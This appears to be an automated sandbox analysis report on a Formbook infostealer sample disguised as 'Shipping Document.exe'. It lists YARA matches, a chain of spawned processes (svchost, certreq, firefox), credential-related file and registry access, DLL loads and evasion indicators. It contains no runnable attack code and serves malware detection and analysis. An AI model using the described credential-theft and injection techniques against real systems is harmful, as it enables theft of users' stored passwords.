Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F32EDB	4_2_02F32EDB
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F49DF0	4_2_02F49DF0

Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: String function: 00FE0D27 appears 70 times
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: String function: 00FC7F41 appears 35 times
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: String function: 00FE8B40 appears 42 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0302B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03087E54 appears 111 times
Source: C:\Windows\SysWOW64\certreq.exe	Code function: String function: 055BEA12 appears 86 times
Source: C:\Windows\SysWOW64\certreq.exe	Code function: String function: 05597E54 appears 98 times
Source: C:\Windows\SysWOW64\certreq.exe	Code function: String function: 0553B970 appears 269 times
Source: C:\Windows\SysWOW64\certreq.exe	Code function: String function: 055CF290 appears 105 times
Source: C:\Windows\SysWOW64\certreq.exe	Code function: String function: 05585130 appears 36 times

Source: Shipping Document.exe, 00000001.00000003.1507169817.0000000003D9D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Shipping Document.exe
Source: Shipping Document.exe, 00000001.00000003.1507813362.0000000003C43000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Shipping Document.exe

Source: Shipping Document.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@16/11

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_0102A2D5 GetLastError,FormatMessageW,

1_2_0102A2D5

Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_01018713 AdjustTokenPrivileges,CloseHandle,		1_2_01018713
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_01018CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		1_2_01018CC3

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_0102B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

1_2_0102B59E

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_0103F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

1_2_0103F121

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_0102C602 CoInitialize,CoCreateInstance,CoUninitialize,

1_2_0102C602

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_00FC4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

1_2_00FC4FE9

Source: C:\Users\user\Desktop\Shipping Document.exe

File created: C:\Users\user~1\AppData\Local\Temp\autA2D7.tmp

Jump to behavior

Source: Shipping Document.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\Shipping Document.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: certreq.exe, 00000004.00000003.1862755952.00000000034E9000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3981081238.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3981081238.0000000003517000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1862641741.00000000034C8000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3981081238.00000000034E9000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Shipping Document.exe	ReversingLabs: Detection: 54%
Source: Shipping Document.exe	Virustotal: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\Shipping Document.exe "C:\Users\user\Desktop\Shipping Document.exe"
Source: C:\Users\user\Desktop\Shipping Document.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipping Document.exe"
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	Process created: C:\Windows\SysWOW64\certreq.exe "C:\Windows\SysWOW64\certreq.exe"
Source: C:\Windows\SysWOW64\certreq.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Shipping Document.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipping Document.exe"	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	Process created: C:\Windows\SysWOW64\certreq.exe "C:\Windows\SysWOW64\certreq.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Shipping Document.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\certreq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\certreq.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Shipping Document.exe

Static file information: File size 1153024 > 1048576

Source: Shipping Document.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Shipping Document.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Shipping Document.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Shipping Document.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Shipping Document.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Shipping Document.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Shipping Document.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: certreq.pdb source: svchost.exe, 00000002.00000003.1621959172.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621830012.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000003.1591967021.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3978300136.000000000010E000.00000002.00000001.01000000.00000004.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3978327377.000000000010E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: Shipping Document.exe, 00000001.00000003.1511356261.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, Shipping Document.exe, 00000001.00000003.1507043382.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558086826.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1555960380.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.00000000056AE000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.0000000005510000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1669727415.00000000051BA000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1674793663.0000000005361000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Shipping Document.exe, 00000001.00000003.1511356261.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, Shipping Document.exe, 00000001.00000003.1507043382.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1670469944.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558086826.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1555960380.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, certreq.exe, 00000004.00000002.3984920272.00000000056AE000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.0000000005510000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1669727415.00000000051BA000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1674793663.0000000005361000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: certreq.exe, 00000004.00000002.3981081238.0000000003471000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.0000000005B3C000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1970178698.000000001694C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: certreq.exe, 00000004.00000002.3981081238.0000000003471000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.0000000005B3C000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1970178698.000000001694C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: certreq.pdbGCTL source: svchost.exe, 00000002.00000003.1621959172.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621830012.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000003.1591967021.00000000012BB000.00000004.00000020.00020000.00000000.sdmp

Source: Shipping Document.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Shipping Document.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Shipping Document.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Shipping Document.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Shipping Document.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_0103C304 LoadLibraryA,GetProcAddress,

1_2_0103C304

Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FE8B85 push ecx; ret	1_2_00FE8B98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00407003 push 88CA774Fh; iretd	2_2_00407013
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A09F push 5D5B5E5Fh; ret	2_2_0041A0A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040196F push ecx; ret	2_2_00401979
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040A13F push esp; ret	2_2_0040A141
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040C9C3 pushfd ; iretd	2_2_0040C9C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041198D push ebp; iretd	2_2_0041198F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041324A push edx; iretd	2_2_0041324B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00407207 push eax; ret	2_2_0040721D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004032C0 push eax; ret	2_2_004032C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401A92 push ds; ret	2_2_00401A99
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413398 push esi; iretd	2_2_004133F4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00408435 push ebx; retf	2_2_0040843D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040ACBC push cs; retf	2_2_0040ACBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404D02 push ds; iretd	2_2_00404D03
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404DFC push eax; iretd	2_2_00404DFD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401F7D push ebx; iretd	2_2_00401F7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0300225F pushad ; ret	2_2_030027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030027FA pushad ; ret	2_2_030027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx	2_2_030309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0300283D push eax; iretd	2_2_03002858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0300135E push eax; iretd	2_2_03001369
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055409AD push ecx; mov dword ptr [esp], ecx	4_2_055409B6
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F3FCCB push edi; retn B137h	4_2_02F3FE78
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F300DA push esi; iretd	4_2_02F30131
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F25172 push ebx; retf	4_2_02F2517A
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F2E6CA push ebp; iretd	4_2_02F2E6CC
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F21A3F push ds; iretd	4_2_02F21A40
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F21B39 push eax; iretd	4_2_02F21B3A
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F279F9 push cs; retf	4_2_02F279FB
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F26E7C push esp; ret	4_2_02F26E7E

Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		1_2_00FC4A35
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_010455FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		1_2_010455FD

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_00FE33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00FE33C7

Source: C:\Users\user\Desktop\Shipping Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0307096E rdtsc

2_2_0307096E

Source: C:\Windows\SysWOW64\certreq.exe	Window / User API: threadDelayed 1059			Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Window / User API: threadDelayed 8913			Jump to behavior

Source: C:\Users\user\Desktop\Shipping Document.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_1-99571

Source: C:\Users\user\Desktop\Shipping Document.exe	API coverage: 4.8 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\certreq.exe	API coverage: 2.8 %

Source: C:\Windows\SysWOW64\certreq.exe TID: 5696	Thread sleep count: 1059 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe TID: 5696	Thread sleep time: -2118000s >= -30000s	Jump to behavior
